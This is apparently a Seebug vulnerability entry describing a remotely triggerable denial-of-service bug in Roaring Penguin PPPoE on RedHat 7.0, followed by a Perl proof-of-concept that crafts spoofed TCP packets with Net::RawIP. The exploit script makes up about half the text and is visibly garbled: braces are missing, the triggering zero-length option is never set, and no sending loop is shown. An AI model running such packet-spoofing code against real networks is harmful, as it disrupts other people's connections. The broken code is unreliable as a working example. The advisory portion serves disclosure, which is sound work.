RedHat Linux 7.0 Roaring Penguin PPPoE Denial of Service Vulnerability

ID SSV:74369
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00


No description provided by source.


Roaring Penguin Software's PPPoE is a freeware PPP over Ethernet client often used by ADSL subscribers running Linux or NetBSD.

PPPoE contains a possibly remotely exploitable denial of service vulnerability in its handling of TCP packets when the Clamp_MSS option is used. If PPPoE recieves a malformed TCP packet with a "zero-length option", PPPoE will go into an infinite loop. As a result, the ppp connection being supported by PPPoE will time out and be terminated. A manual re-start is needed to regain functionality.

This bug has been fixed by Roaring Penguin Software in a new version, see the solutions section. 

# POC script that causes a DoS in an PPP-over-Ethernet Link, in RedHat 7.0.
# Advisory:
# by dethy
use Net::RawIP;
use Getopt::Std;
getopts('d:s:p:c',\%args) || &usage;

sub randport(){
 return $sport=(int rand 65510); 

sub randsrc(){
  return $saddr=(int rand 255).".".(int rand 255).".".(int rand 255).".".(int rand 255); 

 $packet = new Net::RawIP({ip=>{},tcp=>{}});
 $packet->set({ ip => { saddr => $src, 
			daddr => $daddr, 
			tos => 3 },
               tcp => { source => $sport, 
			dest => $port,
                        syn => 1, psh => 1 } });


sub usage(){ die("pppoe-link POC DoS on RH7\n$0 -d <dest> -s <source> -p <port> -c <count>\n"); }